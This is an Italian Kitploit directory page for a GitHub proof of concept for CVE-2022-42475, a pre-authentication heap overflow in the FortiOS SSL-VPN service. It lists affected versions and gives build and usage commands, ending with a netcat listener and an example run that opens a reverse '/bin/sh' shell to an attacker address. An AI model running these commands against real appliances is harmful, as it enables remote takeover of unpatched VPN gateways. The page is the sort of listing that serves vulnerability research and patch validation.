Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2022-42475-poc — Proof of Concept (PoC) per la ricerca e la validazione controllata in laboratorio della CVE-2022-42475, una vulnerabilità critica di buffer overflow basato su heap che interessa il servizio SSL-VPN in alcune versioni di FortiOS. | Kitploit
Strumenti/GitHubGitHub/ull0a/cve-2022-42475-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingStrumento di Accesso Remoto
GitHubull0a/cve-2022-42475-poc

cve-2022-42475-poc

Proof of Concept (PoC) per la ricerca e la validazione controllata in laboratorio della CVE-2022-42475, una vulnerabilità critica di buffer overflow basato su heap che interessa il servizio SSL-VPN in alcune versioni di FortiOS.

Vedi Repository
16h 29m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-42475 PoC

Fortinet SSL VPN Pre-Authentication Remote Code Execution

Descrizione

CVE-2022-42475 è una vulnerabilità di heap-based buffer overflow nel servizio SSL VPN di FortiOS che consente a utenti malintenzionati non autenticati di eseguire codice arbitrario in remoto (RCE) tramite richieste HTTP appositamente progettate indirizzate all'endpoint /remote/error.

Questa vulnerabilità è stata sfruttata attivamente in natura (0-day) prima della pubblicazione della patch ufficiale.

Esecuzione della PoC

La seguente schermata mostra l'esecuzione della PoC in un ambiente di laboratorio autorizzato:

L'output mostra l'esecuzione della PoC e l'interazione con l'istanza di FortiOS utilizzata per i test.

Esecuzione della PoC

Informazioni sul CVE

CampoValore
CVE IDCVE-2022-42475
CVSS 3.19.3 (Critical)
VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-122
ScopertoDicembre 2022
Patch ufficialeFortiOS 7.2.3, 7.0.9, 6.4.11, 6.2.12, 6.0.16

Versioni Interessate

  • FortiOS 7.2.0–7.2.2
  • FortiOS 7.0.0–7.0.8
  • FortiOS 6.4.0–6.4.10
  • FortiOS 6.2.0–6.2.11
  • FortiOS 6.0.0–6.0.15
  • FortiOS 5.6.0–5.6.14
  • FortiOS 5.4.0–5.4.13
  • FortiOS 5.2.0–5.2.15
  • FortiOS 5.0.0–5.0.14

Requisiti

  • Go 1.18+ (per compilare la PoC)
  • Accesso di rete al target sulla porta 443 (o porta SSL VPN configurata)
  • Ambiente di laboratorio autorizzato per effettuare i test

Compilazione

root@kitploit:~
# Clonar o descargar el código fuente
git clone https://github.com/uLl0a/cve-2022-42475-poc
cd cve-2022-42475-poc

# Compilar
go build -o exploit exploit.go

# O ejecutar directamente
go run exploit.go <target> <port> <reverse_ip> <params>

Utilizzo

root@kitploit:~
./exploit <target_host> <target_port> <reverse_ip> <param1> [param2...]

Esempio

root@kitploit:~
# En el atacante, iniciar listener
nc -lvnp 80

# Ejecutar el exploit
./exploit 192.168.1.100 443 10.0.0.5 /bin/sh -i
Scarica lo strumento